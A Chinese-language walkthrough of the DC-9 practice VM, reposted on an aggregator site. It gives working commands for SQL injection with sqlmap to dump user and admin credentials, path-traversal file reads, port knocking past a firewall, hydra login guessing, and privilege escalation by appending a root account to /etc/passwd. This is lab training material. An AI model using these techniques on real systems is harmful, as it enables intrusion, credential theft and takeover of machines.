靶机DC-9
Posted Jach1n
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了靶机DC-9相关的知识,希望对你有一定的参考价值。
靶机下载地址:https://www.five86.com/dc-9.html
靶机设置为NAT模式,使用Nmap扫描网段
确定靶机IP地址
有80端口去访问下网站
发现display界面有用户信息
可以搜索界面去搜索用户名
搜索的时候要注意下,输一个就可以了 "first or last name"
随便试了个万能语句发现有sql注入
把抓的包导出,sqlmap跑post注入
sqlmap四连
sqlmap -r ./home/kali/Desktop/dc9 --dbs
sqlmap -r ./home/kali/Desktop/dc9 --tables -D users
sqlmap -r ./home/kali/Desktop/dc9 --columns -T UserDetails -D users
sqlmap -r ./home/kali/Desktop/dc9 --dump -C "username,password" -T UserDetails -D users
由于登录处需要的是username,这里的跑参数注意下
竟然登不上,跑了下别的库,找到了admin密码
sqlmap -r ./home/kali/Desktop/dc9 --dump -C "Username,Password" -T Users -D Staff
md5解密,admin/transorbital1
admin登录成功
发现页面显示File does not exist 文件不存在
试下文件包含?file=../../../../etc/passwd
找不到啥东西了,试下ssh也登不上,ssh状态为filtered,一般是被防火墙过滤了
查了下是ssh开启了knockd,端口敲门
需要按照指定顺序敲击端口,如果敲击的端口和顺序正确,防火墙会更改策略对该访问ip放行,来达到访问效果
访问下knockd配置文件
?file=../../../../etc/knockd.conf
分别去敲击指定端口,ssh状态变成open
for x in 7469 8475 9842;do nmap -Pn --max-retries 0 -p $x 192.168.74.133;done
然后使用之前跑出来的账号密码尝试登陆ssh
使用hydra进行测试,发现了三组账号
在janitor中发现了几个密码,加到我们的密码字典中
sudo -l发现test文件有root权限
切换到test目录看下,找下这个test.py
在/opt/devstuff目录下
脚本的作用就是将第一个文件的内容附加到另一个文件里面去
在etc/passwd文件里进行写入账号密码
运行脚本的时候最好切换到test目录下
openssl passwd -1 -salt dc 123456
echo dc:$1$dc$5uDk4oYnRiBs0fFGlcRwy.:0:0:root:/bin/bash >> /tmp/dc
sudo ./test /tmp/dc /etc/passwd
写入完成后登录到我们创建的新账号
在root目录下获取flag
以上是关于靶机DC-9的主要内容,如果未能解决你的问题,请参考以下文章